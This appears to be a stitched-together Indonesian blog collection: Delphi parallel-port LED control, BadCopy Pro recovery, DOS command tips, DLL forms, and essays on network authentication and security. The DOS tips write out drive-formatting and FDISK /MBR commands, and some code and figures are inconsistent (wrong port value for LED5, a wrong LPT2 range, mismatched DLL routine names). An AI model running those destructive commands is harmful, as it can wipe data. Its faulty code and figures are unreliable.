Untuk keperluan uji-coba sesaat, kita bisa menghubungkan LED (Light Emitting Diode) lewat resistor, langsung ke pin output dari parallel printer port. Bisa juga hanya dengan mengukur tegangan 5 volt yang timbul, saat data port dalam keadaan high.

Untuk dapat mengakses beban yang besar serta untuk mencegah terjadinya pembebanan berlebihan pada parallel printer port, sebaiknya kita menggunakan rangkaian penyangga (buffer).

Dari skema pada Gambar 4, terlihat pin 3,5,7,9,12,16 dan 18
dari 74LS224 terhubung ke masing-masing relai. Selanjutnya
sakelar pada setiap relai tersebut, bisa kita gunakan untuk
mengontrol peralatan yang memiliki beban besar.

Kode Program Delphi
Tidak seperti Turbo Pascal atau Delphi 1 dimana tersedia fungsi Port,
pada Delphi 32 bit (versi 2 s/d 6) fungsi itu sudah tidak didukung lagi.
Sebagai gantinya kita gunakan in-line assembler code.

Listing 1. Hidupkan LED 5 dari rangkaian pada Gambar 3.

procedure KirimDataKePort(AlamatPort: Word; DataBit: Byte);

1. (* alamat LPT1, range 378-37F hex
2. alamat LPT2, range 278-37F hex
3. alamat LPT3, range 3BC-3BF hex
4. lihat juga referensi teknis dari Intel dan Microsoft *)
5. asm
6. MOV DX, AlamatPort
7. MOV AL, DataBit
8. OUT DX, AL
9. end;
10. 
    
11. procedure TForm1.btnLED5Click(Sender: TObject);
12. begin
13. (* contoh pemanggilan prosedur KirimDataKePort,
14. ini akan menyalakan LED 5 (data bit-4 / pin 6
15. dari rangkaian yang terdapat pada Gambar 3. *)
16. KirimDataKePort($378, $8); //00010000 biner
17. end;

Pada prinsipnya, untuk menyalakan LED, kita kirim data biner
8 bit ke port. Sesuaikan pengiriman data biner ini, dengan LED
yang ingin dinyalakan.

Misalnya, untuk menyalakan LED pertama datanya adalah 1 hex
(biner; 0000001), sedangkan data biner 10000000
(80 hex / 128 dec) digunakan untuk menyalakan LED kedelapan.
Daftar berikut, dapat digunakan sebagai acuan.
DataPort Bit 0 = LED1 = 00000001 bin = 1 hex = 1 dec
DataPort Bit 1 = LED2 = 00000010 bin = 2 hex = 2 dec
DataPort Bit 2 = LED3 = 00000100 bin = 4 hex = 4 dec
DataPort Bit 3 = LED4 = 00001000 bin = 8 hex = 8 dec
DataPort Bit 4 = LED5 = 00010000 bin = 10 hex = 16 dec
DataPort Bit 5 = LED6 = 00100000 bin = 20 hex = 32 dec
DataPort Bit 6 = LED7 = 01000000 bin = 40 hex = 64 dec
DataPort Bit 7 = LED8 = 10000000 bin = 80 hex = 128 dec

Bagi yang ingin bereksperimen, Listing 2 merupakan kode program
dari contoh Aplikasi Pengendali seperti yang terlihat pada Gambar 5.

Listing 2. Kode program aplikasi pengendali.
(* = Mengontrol peralatan luar lewat Parallel Printer Port = *)

unit Unit1;

1. 
   
2. interface
3. 
   
4. uses
5. Windows, Messages, SysUtils, Classes, Graphics, Controls,
6. Forms, Dialogs, Buttons, ExtCtrls, StdCtrls;
7. type
8. TForm1 = class(TForm)
9. SpeedButton1: TSpeedButton;
10. SpeedButton2: TSpeedButton;
11. SpeedButton3: TSpeedButton;
12. SpeedButton4: TSpeedButton;
13. SpeedButton5: TSpeedButton;
14. SpeedButton6: TSpeedButton;
15. SpeedButton7: TSpeedButton;
16. SpeedButton8: TSpeedButton;
17. Bevel1: TBevel;
18. Bevel2: TBevel;
19. lblDataPortBit: TLabel;
20. lblNoLED: TLabel;
21. Label1: TLabel;
22. Label2: TLabel;
23. Label3: TLabel;
24. procedure SpeedButton1Click(Sender: TObject);
25. procedure FormCreate(Sender: TObject);
26. private
27. procedure KirimDataKePort(DataPortBit: Byte);
28. public
29. { Public declarations }
30. end;
31. 
    
32. var
33. Form1: TForm1;
34. 
    
35. implementation
36. 
    
37. {$R *.DFM}
38. 
    
39. uses
40. Math;
41. 
    
42. const
43. AlamatPort = $378;
44. 
    
45. procedure TForm1.KirimDataKePort(DataPortBit: Byte);
46. var
47. Nilai: Byte;
48. begin
49. lblDataPortBit.Caption := IntToStr(DataPortBit);
50. lblNoLED.Caption := 'LED No. ' + IntToStr(DataPortBit + 1) +
51. ' Nyala';
52. Nilai := Trunc(Power(2, DataPortBit));
53. asm
54. MOV DX, AlamatPort
55. MOV AL, Nilai
56. OUT DX, AL
57. end;
58. end;
59. 
    
60. procedure TForm1.SpeedButton1Click(Sender: TObject);
61. begin
62. (* Letakan 8 buah TSpeedButton, atur propeti Tag
63. dari 8 TSpeedButton tersebut dengan nilai
64. 0 sampai dengan 7. Dari Object Inspector,
65. arahkan event Clik dari semua TSpeedButton
66. ke SpeedButon1Click. *)
67. 
    
68. KirimDataKePort((Sender as TSpeedButton).Tag);
69. end;
70. 
    
71. procedure TForm1.FormCreate(Sender: TObject);
72. begin
73. KirimDataKePort(0);
74. end;
75. 
    
76. end.

nanti waktu penulisan pada delphi jangan pake angka.. ini cuma untuk mengurutkan data saja.

Download

Mengembalikan Data Yang Rusak Dengan BadCopy Pro

Disket, flash disk maupun CD merupakan salah satu media penyimpan yang paling sering digunakan. Sayangnya media tersebut kurang “tahan banting” sehingga media tersebut mudah rusak. Apalagi jika salah dalam perawatannya.

Kerusakan media simpan pasti sangat menjengkelkan, apalagi jika data di dalamnya sangat berharga, misalnya data tugas kuliah atau kantor. Kalo masih punya data cadangan di hard disk tentu santai aja, tapi kalo nggak punya cadangannya? Harus bikin baru lagi? Kayaknya bikin stres aja

Selama ini mungkin Anda menganggap bahwa jika disket sudah tidak dapat dibuka di Windows Explorer data pada disket tersebut pasti sudah tidak dapat diselamatkan/dikembalikan (recovery) lagi. Jika demikian, anggapan Anda salah.

Dengan menggunakan program BadCopy Pro Anda masih dapat menyelamatkan data dari media yang telah rusak. Tentunya tidak dapat 100%. Tapi kayaknya masih mending daripada tidak sama sekali khan? Untuk mendapatkan BadCopy Pro Anda dapat mendownload dari www.jufsoft.com.

Adapun langkah-langkah untuk mengembalikan data dengan BadCopy Pro adalah sebagai berikut:

1. Pertama pilih dahulu dari media mana data yang akan diselamatkan (recovery). Ada empat macam media, yaitu Floppy Disk, CD ROM, Digital Media, dan Other Media. Jika ingin mengembalikan data yang terletak di disket silakan pilih Floppy Disk.

2. Pilih jenis Recovery Mode. Ada tiga macam recovery mode:

• Rescue Corrupted Files Mode, pilih mode ini jika data yang terdapat pada disket masih dapat dibaca/dilihat dari Windows Explorer.
• Rescue Lost Files Mode #1 dan Mode #2, pilih mode ini jika data pada disket tidak dapat dilihat dengan Windows Explorer (misalnya jika mengklik Drive A pada Windows Explorer muncul pesan kesalahan seperti A:\ is not accessible. The system can not read from the specified device atau … Do you want to format it now?).

3. Jika Anda memilih Mode #1 tapi data belum dapat diselamatkan, Anda bisa mencoba Mode #2. Jika sukses maka akan muncul daftar file dapat diselamatkan kembali. Nama file yang terdapat pada daftar akan dinamai dengan File 1, File 2, File 3 dan seterusnya, jadi nama filenya berbeda dengan nama file aslinya.

Selanjutnya pilih nama file yang akan diselamatkan dan klik pada tombol Next.

4. Pada kotak dialog selanjutnya akan muncul pilihan dimana file yang akan diselamatkan akan diletakkan. Defaultnya adalah C:\PROGRAM FILES\JUFSOFT\BADCOPY\Recovered\.

Parameter Tersembunyi DOS

TRUENAME
Digunakan untuk menampilkan path file atau directory
Syntax:
TRUENAME namafile -

FDISK /STATUS
Ada cara yang lebih mudah untuk melihat informasi partisi harddisk. Kalau biasanya kita harus masuk dulu ke FDISK kemudian memilih option 4. Maka dengan FDISK /STATUS kita dapat langsung langsung melihat informasi partisi tersebut. Perintah ini setidaknya dapat memperpendek langkah kerja kita dan mengurangi resiko kesalahan pada FDISK. Catatan : Perintah ini tidak akan bekerja pada DOS 3.30.

FDISK /MBR
Perintah di atas akan menuliskan pada master boot record pada hard disk tanpa merubah informasi tabel partisi. Sebagai catatan, penulisan pada master boot record (pada kasus ini) dapat menimbulkan beberapa masalah pada beberapa dual boot program. Bagi Anda yang pernah menginstall Linux dan Windows pada satu hard disk dan meletakkan LILO pada master boot record, Anda dapat menghilangkan LILO dengan perintah tersebut. Anda juga dapat menghilangkan virus yang menyerang boot sector, dengan cara booting dari disk yang bersih dan FDISK /MBR.

SHELL=C:\COMMAND.COM /P /F pada (config.sys)
Perintah di atas akan menjalankan “Fail” pada pilihan “Abort, Retry, Fail” (Pilihan “Abort, Retry, Fail” biasa muncul bila terjadi “masalah” pada saat berada pada DOS prompt).

VER /R
Menampilan informasi tentang versi DOS secara lebih lengkap

Parameter rahasia Format
Menentukan ukuran cluster: format Drive: /z:ClusterSize*2
Tidak menyimpan informasi buat unformat: format Drive: /u
Contoh:
Format d: /z:8 akan menghasilkan cluster ukuran 4 kB Contoh:
Format d: /z:32 akan menghasilkan cluster ukuran 16 kB

Menambahkan Form Pada DLL

Dynamic Link Library atau DLL merupakan file yang berisi rutin (procedure dan function) yang dapat dipanggil dari file EXE maupun dari file DLL lain. Dengan meletakkan rutin-rutin pada file DLL (terpisah dari file EXE) maka terdapat beberapa keuntungan.

Pertama, rutin-rutin yang bersifat umum dapat dipakai oleh beberapa aplikasi pada saat yang bersamaan dan hanya diperlukan satu copy di memory atau disk. Anda dapat mengatur supaya rutin-rutin yang terdapat pada DLL tersebut dimuat ke memory hanya saat diperlukan saja. Jika tidak diperlukan maka DLL tersebut dapat dibuang dari memory. Dengan demikian aplikasi yang Anda buat dapat lebih menghemat penggunaan memory.

Keuntungan kedua, aplikasi menjadi bersifat modular. Anda dapat melakukan update aplikasi yang Anda buat tanpa harus mengupdate file EXE. Dengan demikian Anda cukup menyertakan patches kepada program Anda tanpa Anda harus menyertakan seluaruh aplikasi.

Keuntungan lain adalah ukuran file EXE menjadi lebih kecil karena beberapa kode program diletakkan pada file DLL.

Membuat file DLL

Untuk membuat file DLL, caranya pilih menu File | New | DLL. Anda dapat menyimpan project tersebut dengan ProyekDLL.dpr.

Pada code editor dapat Anda perhatikan pada bagian paling atas terdapat klausa library. Hal ini menandakan bahwa proyek yang sedang dibuat adalah proyek file DLL. Selanjutnya tambahkan form dari menu File | New Form. Form tersebut harus ditambahkan ke dalam project, yaitu dengan memilih menu Projet | Add to Project dan pilih file unit dari Form (pada contoh ini adalah FormDLL.pas). Contoh DLL ini mempunyai dua method (satu procedure dan satu function) yang berfungsi untuk menampilkan form. Satu menggunakan Show dan satunya lagi menggunakan ShowModal.

procedure ShowFormDLL;stdcall;

1. begin
2. frmFormDLL :=TfrmFormDLL.Create(nil);
3. frmFormDLL.Show;
4. end;

Prosedur di atas, pertama kali akan membuat form. Parameter nil digunakan, karena kita tidak mengetahui siapa pemilik (owner) formnya. Selanjutnya form yang baru dibuat tersebut akan ditampilkan dengan menggunakan method Show.

Untuk menampilkan form secara modal caranya sedikit berbeda.

function ShowFormDLLModal:integer;stdcall;

1. begin
2. frmFormDLL := TfrmFormDLL.Create(nil);
3. Result := frmFormDLL.ShowModal;
4. end;

Perbedaan antara kode di atas dan kode sebelumnya adalah, bahwa kode di atas adalah function, sedangkan kode sebelumnya adalah procedure, kode di atas menggunakan ShowModal sedangkan kode sebelumnya menggunakan Show. Dengan menggunakan ShowModal Anda dapat mengetahui modal result dari form.
Pada kedua kode tersebut kita membuat form tapi tanpa pernah melakukan destroy, yang bisa mengakibatkan pemborosan memory (leaking memory). Oleh karena itu Anda perlu melakukan destroy pada form. Salah satu cara termudah adalah dengan menggunakan event OnClose dari form dan mengeset TCloseAction menjadi caFree.

procedure TfrmFormDLL.FormClose(Sender: TObject; var Action: TCloseAction);

1. begin
2. Action := caFree;
3. end;

Langkah terakhir adalah melakukan eksport procedure ShowFormDLL dan function ShowFormDLLModal di atas sehingga dapat digunakan atau dipanggil oleh program lain.

Exports

1. ShowFormDLL,
2. ShowFormDLLModal;
4. begin
6. end.

Untuk membuat kode di atas menjadi file DLL Anda dapat memilih menu Project | Build.

Memanggil DLL secara statis

Setelah Anda berhasil membuat DLL, selanjutnya Anda dapat membuat aplikasi yang akan memanggil rutin yang terdapat pada DLL tersebut. Untuk itu, pilih menu File | New Application. Selanjutnya Anda dapat menuliskan kode di bawah ini sebelum klausa implementation.

procedure ShowForm;stdcall;external 'ProyekDLL.dll' name 'ShowFormDLL';

1. function ShowFormModal:integer;stdcall;external 'ProyekDLL.dll' name 'ShowFormDLLModal';

Klausa external digunakan untuk memberitahu compiler bahwa aplikasi tersebut membutuhkan rutin ShowFormDLL dan ShowFormDLLModal yang terletak pada file eksternal (file di luar program utama) bernama ProyekDLL.dll. Selanjutnya rutin ShowFormDLL dan ShowFormDLLModal akan dipanggil pada event OnClick dari Button1 dan Button2.

procedure TForm1.Button1Click(Sender: TObject);

1. begin
2. ShowDllForm;
3. end;
5. procedure TForm1.Button2Click(Sender: TObject);
6. begin
7. ShowDllFormModal;
8. end;

Memanggil DLL secara dinamis

Cara di atas tentunya belum sesuai dengan harapan Anda yang akan mengefisienkan penggunaan memory, karena program di atas akan selalu meloading DLL pada saat aplikasi pertama kali dijalankan. Cara yang kedua ini akan lebih efisian, yaitu dengan memanggil DLL secara dinamis. Dengan kata lain DLL akan dimuat ke memory hanya pada saat diperlukan saja.

Untuk dapat menggunakan rutin yang terdapat pada suatu file DLL, terlebih dahulu Anda harus memanggil file DLL tersebut. Caranya yaitu dengan memanggil fungsi LoadLibrary. Fungsi ini mempunyai sebuah parameter, yaitu nama file DLL yang akan dibuka.

DLLHandle := LoadLibrary('ProyekDLL.dll');

1. Jika DLL berhasil dibuka maka fungsi LoadLibrary akan mengembalikan nilai bukan nol. Sebaliknya jika gagal akan mengembalikan nilai nol. Setelah DLL berhasil diloading ke dalam memory, selanjutnya Anda dapat memanggil rutin yang terdapat pada DLL tersebut. Yang perlu diperhatikan, Anda tidak dapat menggunakan nama fungsi melainkan dengan memanggil alamatnya. Untuk memanggil alamat fungsi Anda dapat menggunakan fungsi GetProcAddress.
2. Fungsi GetProcAddress mempunyai dua parameter, parameter pertama adalah handle dari DLL, sedangkan parameter kedua adalah nama fungsi yang akan dipanggil.
3. &lt;pre lang="Delphi"&gt;if DLLHandle &amp;lt;&amp;gt; 0 then
4. begin
5. @ShowForm := GetProcAddress(DLLHandle, 'ShowFormDLL');
6. @ShowFormModal := GetProcAddress(DLLHandle, 'ShowFormDLLModal');
7. ShowFormModal;
8. end;

Setelah Anda selesai menggunakan DLL, Anda dapat membuang DLL tersebut dari memory. Caranya yaitu dengan memanggil fungsi FreeLibrary.

FreeLibrary(DLLHandle);

Download

Membuat Rounded Form

Secara default form yang Anda buat akan berbentuk segi empat. Dengan menambahkan beberapa baris kode berikut Anda dapat membuat form berbentuk elips atau lingkaran.

procedure TForm1.FormCreate(Sender: TObject);

1. var
2. region : HRgn;
3. begin
4. region := CreateEllipticRgn(1,1,200,200);
5. SetWindowRgn(handle, region, true);
6. end;

Jika Anda membuka referensi Windows API tentang function CreateEllipticRgn maka akan didapat keterangan seperti di bawah ini:

HRGN CreateEllipticRgn(

int nLeftRect, // x-coordinate of the upper-left corner of the bounding rectangle
int nTopRect, // y-coordinate of the upper-left corner of the bounding rectangle
int nRightRect, // x-coordinate of the lower-right corner of the bounding rectangle
int nBottomRect // y-coordinate of the lower-right corner of the bounding rectangle
);

Mempercayai Password: Network Authentication

Aspek security jaringan berkaitan erat dengan servis yang disediakan: inbound atau outbound. Security pada servis outbound dapat diupayakan sebaik mungkin dengan konfigurasi firewall. Demikian pula dengan akses anonymous servis inbound, seperti anonymous FTP, HTTP, Gopher dll. Dalam hal ini, informasi sengaja disediakan bagi semua orang. Lain halnya bila kita ingin menyediakan akses non-anonymous (atau authenticated services), dimana selain melalui firewall, seseorang yang meminta akses juga harus mendapat ‘ijin’ server setelah terlebih dahulu membuktikan identitasnya. Inilah authentication. Untuk selanjutnya, penulis menggunakan istilah autentisasi sebagai sinonim kata tersebut.

RESIKO-SECURITY SERVIS INBOUND
Mengapa perlu autentisasi…..? Internet adalah jaringan publik, dan terbuka bagi setiap orang diseluruh penjuru dunia untuk menggabungkan diri. Begitu besarnya jaringan ini, telah menimbulkan keuntungan serta kerugian. Sering kita dengar dan baca tentang bobolnya sistem komputer keuangan bank, informasi rahasia Pentagon atau basis data transkrip akademik mahasiswa. Kalimat tersebut cukup untuk mewakili pernyataan bahwa kita harus ‘waspada’ terhadap orang-orang ‘jahat’ dan senantiasa berusaha memperkecil kemungkinan bagi mereka untuk dapat melakukan niat jahatnya. Memang mudah untuk meniadakan kemungkinan penyusupan (akses ilegal) dari luar dengan menutup semua kanal trafik servis inbound ke jaringan internal. Namun ini berarti telah mereduksi keuntungan utama adanya jaringan: komunikasi dan pemakaian sumber daya bersama (sharing resources). Jadi, konsekuensi alami dengan jaringan cukup besar, adalah menerima dan berusaha untuk memperkecil resiko ini, bukan meniadakannya.

Kita akan mulai dari seorang network-administrator (NA) yang telah melakukan tugasnya dengan baik, dalam menyiapkan ‘pertahanan’ bagi semua servis outbound dan anonymous-inbound. Perlu beberapa hal tambahan lagi yang sebaiknya diingat. Apakah pertahanan tersebut sudah cukup kuat bagi terjadinya pencurian hubungan (hijacking attack)? Apakah didalamnya sudah dipertimbangkan kemungkinan pemonitoran ilegal paket-paket informasi yang dikirimkan (packet sniffing - playback attack)? Atau apakah sudah termasuk kesiapan bagi benar-benar adanya akses ilegal didalam sistem (false authentication)?

Hijacking biasanya terjadi pada komputer yang menghubungi jaringan kita, walaupun untuk beberapa kasus langka, bisa terjadi pada sembarang jalur yang dilaluinya. Sehingga akan bijaksana bila seorang NA mempertimbangkan pemberian kepercayaan akses, hanya dari komputer yang paling tidak mempunyai sistem security sama atau mungkin lebih ‘kuat’, dibandingkan dengan jaringan dibawah tanggung-jawabnya. Usaha memperkecil peluang musibah ini, juga dapat dilakukan dengan mengatur packet-filter dengan baik atau menggunakan server modifikasi. Misalnya, kita dapat menyediakan fasilitas anonymous-FTP bagi sembarang komputer dimanapun, tapi authenticated-FTP hanya diberikan pada host-host yang tercantum pada daftar ‘kepercayaan’. Hijacking ditengah jalur dapat dihindari dengan penggunaan enkripsi antar jaringan (end to end encryption).

Kerahasiaan data dan password juga merupakan topik disain security. Program yang didedikasikan untuk packet-sniffing dapat secara otomatis menampilkan isi setiap paket data antara client dengan servernya. Proteksi password dari kejahatan demikian dapat dilakukan dengan implementasi password sekali pakai (non-reusable password), sehingga walaupun dapat termonitor oleh sniffer, password tersebut tidak dapat digunakan lagi.

Resiko hijacking dan sniffing data (bukan password) tidak dapat dihindari sama sekali. Artinya NA harus mempertimbangkan kemungkinan ini dan melakukan optimasi bagi semakin kecil-nya kesempatan tersebut. Pembatasan jumlah account dengan akses penuh serta waktu akses jarak jauh, merupakan salah satu bentuk optimasi.

MEKANISME AUTENTISASI
Subyek autentisasi adalah pembuktian. Yang dibuktikan meliputi tiga kategori, yaitu: sesuatu pada diri kita (something you are SYA), sesuatu yang kita ketahui (something you know SYK), dan sesuatu yang kita punyai (something you have SYH). SYA berkaitan erat dengan bidang biometrik, seperti pemeriksaan sidik-jari, pemeriksaan retina mata, analisis suara dll. SYK identik dengan password. Sedangkan bagi SYH umumnya digunakan kartu identitas seperti smartcard. \

Barangkali, yang sekarang masih banyak digunakan adalah sistem ber-password. Untuk menghindari pencurian password dan pemakaian sistem secara ilegal, akan bijaksana bila jaringan kita dilengkapi sistem password sekali pakai. Bagaimana caranya penerapan metoda ini?

Pertama, menggunakan sistem perangko-waktu ter-enkripsi. Dengan cara ini, password baru dikirimkan setelah terlebih dulu dimodifikasi berdasarkan waktu saat itu. Kedua, menggunakan sistem challenge-response (CR), dimana password yang kita berikan tergantung challenge dari server. Kasarnya kita menyiapkan suatu daftar jawaban (response) berbeda bagi ‘pertanyaan’ (challenge) yang berbeda oleh server. Karena tentu sulit sekali untuk menghafal sekian puluh atau sekian ratus password, akan lebih mudah jika yang dihafal adalah aturan untuk mengubah challenge yang diberikan menjadi response (jadi tidak random). Misalnya aturan kita adalah: “kapitalkan huruf kelima dan hapus huruf keempat”, maka password yang kita berikan adalah MxyPtlk1W2 untuk challenge sistem Mxyzptlk1W2.

Kalau pada sistem CR, harus diketahui ‘aturan’-nya, maka pada sistem perangko-waktu, kita mesti mengingat password bagi pemberian perangko-waktu ini. Apakah cara seperti ini tidak mempersulit? Beruntung sekali mekanisme tersebut umumnya ditangani oleh suatu perangkat, baik perangkat lunak ataupun dengan perangkat keras. Kerberos, perangkat lunak autentisasi yang dibuat di MIT dan mengadopsi sistem perangko-waktu, mewajibkan modifikasi client bagi sinkronisasi waktu dengan server serta pemberian password perangko-waktu. Modifikasi program client mengingatkan kita pada proxy dan memang, kurang lebih seperti itu. Sistem CR biasanya diterapkan sekaligus dengan dukungan perangkat keras. Contoh sistem CR operasional adalah perangkat SNK-004 card (Digital Pathways) yang dapat diterapkan bersama-sama dengan paket TIS-FWTK (Trusted Information System - internet FireWall ToolKit).

TIS-FWTK menawarkan solusi password sekali pakai (sistem CR) yang ‘menyenangkan’: S/Key. S/Key menerapkan prosedur algoritma hash iteratif terhadap suatu seed, sedemikian sistem dapat memvalidasi response-client instant tapi tidak mempunyai kemampuan untuk memprediksi response-client berikutnya. Sehingga bila terjadi penyusupan pada sistem, tidak ada ’sesuatu’ yang bisa dicuri (biasanya daftar password). Algoritma hash mempunyai dua sifat utama. Pertama, masukan tidak bisa diregenerasikan dari keluaran (non-reversibel). Kedua, terdapat dua kemungkinan masukan bagi sebuah keluaran yang sama.

ENKRIPSI DAN CRYPTOGRAPHY
Cryptography telah berkembang sejak lama, ketika orang menginginkan informasi yang ia kirimkan tidak dapat ‘dibaca’ oleh pihak tak berkepentingan. Secara tradisional cryptography dikenal dengan dua mekanisme, kunci privat atau kunci publik. DES (data encryption standard) yang digunakan oleh Kerberos menggunakan sistem kunci-privat. RSA (Rivest Shamir Addleman) mengimplementasikan sistem kunci-publik. Salah satu dari kontributor RSA, Ron Rivest kemudian membuat MD4 (message digest function # 4) yang digunakan oleh S/Key-nya TIS-FWTK. Optimasi dan blasteran antara kedua metoda tradisional ini melahirkan PGP (Pretty Good Privacy). Pembahasan dari DES, RSA, atau PGP merupakan buku tersendiri dan tidak pada tempatnya diungkapkan disini. Tapi yang jelas, sistem kunci-privat dicirikan dengan proses encrypt-decrypt melalui kunci identik, sedangkan pada sistem kunci-publik, proses ini dilakukan dengan dua buah kunci: kunci publik untuk encrypt dan kunci rahasia untuk decrypt dimana kedua kunci ini digenerasikan dan mempunyai relasi dekat melalui sebuah algoritma matematis. Karena diperlukan proses matematis terlebih dulu, kecepatan sistem kunci-publik bisa ribuan kali lebih lambat dari algoritma kunci-privat ekivalen walaupun disisi lain menawarkan proteksi lebih baik. Eksploitasi terhadap kelebihan dan kekurangan sistem kunci privat dan publik dilakukan PGP, dimana untuk transmisi data dilakukan secara sistem kunci-privat dengan session-key sehingga berjalan cepat, sedangkan transmisi session-key- nya sendiri menggunakan kunci-publik.

Dengan enkripsi, informasi yang kita kirimkan ke suatu jaringan melalui jaringan lain yang keamanannya meragukan (internet), relatif lebih terjamin. Enkripsi antar jaringan menyebabkan seorang ‘pencuri’ harus berusaha sedikit lebih keras untuk mendapatkan informasi ilegal yang ia harapkan. Ada beberapa kesempatan bagi implementasi enkripsi, yaitu: pada level aplikasi, level data-link, dan level jaringan.
Enkripsi pada level aplikasi mensyaratkan penggunaan perangkat lunak client-server khusus. Sesuai dengan model referensi OSI, enkripsi data-link hanya berlaku untuk hubungan titik ke titik, seperti sistem enkripsi pada modem telepon. Sedangkan enkripsi level jaringan (network layer) diterapkan pada router atau peralatan lain yang bersebelahan dengan jaringan dikedua sisi. Optimasi kepentingan dan kebijakan security dilakukan dengan mengatur jenis/bagian paket IP yang akan dienkrip, penyesuaian terhadap arsitektur firewall dan konsekuensinya, efektifitas distribusi kunci-enkripsi dll. Di masa depan, dimana teknologi VLAN (Virtual LAN) diperkirakan menjadi pilihan utama untuk Intranet (enterprisewide), penggunaan enkripsi level jaringan ini menjadi begitu penting. Barangkali sama pentingnya dengan keadaan sebuah perusahaan yang sementara ini ‘terpaksa’ menggunakan internet sebagai jalur bagi pengiriman informasi sensitif antara kantor pusat dengan cabangnya dibelahan bumi yang lain.

KERBEROS DAN TIS-FWTK AUTHENTICATION SERVER
Kerberos adalah salah satu karya proyek Athena, kolaborasi antara MIT, IBM dan DEC. Kerberos didisain untuk medukung autentisasi dan enkripsi data pada lingkungan terdistribusi melalui modifikasi client atau server standard. Beberapa vendor sistem operasi telah memasukan Kerberos kedalam produknya. MIT sendiri menyediakan secara free banyak versi Unix yang telah di-Kerberizing. Bahkan bagi kepentingan porting ke sistem operasi atau perangkat lunak client-server yang belum mendukung Kerberos, MIT menyediakan source-code nya, juga secara free. Proyek Athena sendiri mengimplementasikan Kerberos pada banyak aplikasi seperti NFS, rlogin, email, dan sistem password. Secure RPC (Sun Microsystems) juga mengimplementasikan hal yang sama.

Ada beberapa hal yang perlu dipertimbangkan dalam implementasi Kerberos. Modifikasi perangkat lunak client dan server akan menyebabkan pembatasan pilihan aplikasi. Sayangnya juga tidak ada metoda alternatif sebagai pengganti modifikasi source-code (seperti dalam proxy yang membolehkan custom user procedure atau custom client software). Kemudian, umumnya orang juga sepakat untuk menyebut: “Kerberos relatif sulit diterapkan/ dikelola”.

Paket sistem autentisasi lain ditawarkan oleh TIS-FWTK: authentication-server. Server ini didisain secara modular, fleksibel sehingga mendukung banyak mekanisme autentisasi populer seperti sistem password reusable standard, S/Key, card SecurdID dari Security Dynamics (sistem dengan perangko-waktu), card SNK-004 Digital Pathways (sistem CR) serta kemudahan untuk pengintegrasian mekanisme baru. Kembali kepada perbincangan diawal tulisan ini, kalau kepentingan utama kita adalah bagaimana menyiapkan ‘pertahanan’ bagi servis inbound non-anonymous, barangkali authentication-server adalah solusi yang patut dipertimbangkan. Mengapa? Bagaimana sistem ini bekerja? Tidak banyak ruang dalam tulisan ini untuk memuat semua diskusi kita tentang autentisasi, tapi ilustrasi penutup berikut akan memberikan sedikit gambaran bagi anda, peminat security jaringan, menyangkut authentication-server.

Penulis: Eueung Mulyana & Onno W. Purbo

Network Security: Apa dan Bagaimana?

Seperti yang kita lihat di saat ini, Internet telah tumbuh dan berkembang hingga mencapai angka beberapa juta unit komputer yang terkoneksi di berbagai belahan dunia. Dari hari ke hari pula informasi yang terkandung di dalam jaringan Internet tersebut semakin lengkap, akurat, dan penting. . Informasi telah menjadi suatu asset yang sedemikian berharga sehingga perlu mendapat perlakuan yang lebih spesifik. Selain itu pula, kemajuan yang dicapai dalam bidang pengembangan sistem operasi komputer sendiri dan utulitasnya sudah sedemikian jauh dimana tingkat performansi, keandalan dan fleksibilitas software menjadi kriteria utama dalam proses pengembangan software. Dengan semakin penting dan berharganya informasi tersebut dan ditunjang oleh kemajuan pengembangan software, tentunya menarik minat para pembobol (hacker) dan penyusup (intruder) untuk terus bereksperimen guna menemukan dan mempergunakan setiap kelemahan yang ada dari konfigurasi sistem informasi yang telah ditetapkan

Bertolak dari kenyataan di atas, muncul sebuah konsep yang lebih sering disebut dengan Network Security. Pada awalnya, konsep ini menjelaskan lebih banyak mengenai keterjaminan (security) dari sebuah sistem jaringan komputer yang terhubung ke Internet terhadap ancaman dan gangguan yang ditujukan kepada sistem tersebut. Cakupan konsep tersebut semakin hari semakin luas sehingga pada saat ini tidak hanya membicarakan masalah keterjaminan jaringan komputer saja, tetapi lebih mengarah kepada masalah-masalah keterjaminan sistem jaringan informasi secara global. Beberapa negara Eropa dan Amerika bahkan telah menjadikan Network Security menjadi salah satu titik sentral perhatian pihak-pihak militer masing-masing.

Sebenarnya, masalah Network Security ini timbul dari konektivitas jaringan komputer lokal yang kita miliki dengan wide-area network (seperti Internet). Jadi, selama jaringan lokal komputer kita tidak terhubung kepada wide-area network, masalah Network Security tidak begitu penting. Tetapi hal ini bukan berarti memberikan arti bahwa bergabung dengan wide-area network adalah suatu hal yang ‘menakutkan’ dan penuh bahaya. Network Security hanyalah menjelaskan kemungkinan-kemungkinan yang akan timbul dari konektivitas jaringan komputer lokal kita dengan wide-area network.

Secara umum, terdapat 3 (tiga) kata kunci dalam konsep Network Security ini, yaitu:

• resiko / tingkat bahaya,
• ancaman, dan
• kerapuhan sistem (vulnerability)

Resiko atau tingkat bahaya
Dalam hal ini, resiko berarti berapa besar kemungkinan keberhasilan para penyusup dalam rangka memperoleh akses ke dalam jaringan komputer lokal yang dimiliki melalui konektivitas jaringan lokal ke wide-area network. Secara umum, akses-akses yang diinginkan adalah :

• Read Access : Mampu mengetahui keseluruhan sistem jaringan informasi.
• Write Access : Mampu melakukan proses menulis ataupun menghancurkan data yang terdapat di sistem tersebut.
• Denial of Service : Menutup penggunaan utilitas-utilitas jaringan normal dengan cara menghabiskan jatah CPU, bandwidth maupun memory.

Ancaman
Dalam hal ini, ancaman berarti orang yang berusaha memperoleh akses-akses illegal terhadap jaringan komputer yang dimiliki seolah-olah ia memiliki otoritas terhadap akses ke jaringan komputer.

Kerapuhan System (Vulnerability)
Kerapuhan sistem lebih memiliki arti seberapa jauh proteksi yang bisa diterapkan kepada network yang dimiliki dari seseorang dari luar sistem yang berusaha memperoleh akses illegal terhadap jaringan komputer tersebut dan kemungkinan orang-orang dari dalam sistem memberikan akses kepada dunia luar yang bersifat merusak sistem jaringan.

Untuk menganalisa sebuah sistem jaringan informasi global secara keseluruhan tentang tingkat keandalan dan keamanannya bukanlah suatu hal yang mudah dilaksanakan. Analisa terhadap sebuah sistem jaringan informasi tersebut haruslah mendetil mulai dari tingkat kebijaksanaan hingga tingkat aplikasi praktisnya.

